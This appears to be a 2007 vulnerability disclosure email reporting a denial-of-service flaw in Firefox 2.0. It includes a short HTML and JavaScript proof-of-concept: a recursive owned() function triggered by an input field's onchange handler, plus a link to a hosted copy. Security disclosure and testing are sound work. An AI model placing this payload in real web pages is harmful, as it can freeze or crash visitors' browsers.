Date: Mon, 1 Jan 2007 20:43:34 +0100
From: [email protected]Subject: Mozilla Firefox 2.0 denial of service vulnerability
To: [email protected]
X-Mailer: Active.mail 1.0
X-OriginatingIP: 194.29.137.67
X-Priority: 3
Content-Type: text/plain; charset=ISO-8859-2
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru
PoC exploit:
<script>
function owned(){
setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">
It is available under the following address:
http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html
Kind regards,
Michal Bucko (sapheal)
HACK.PL
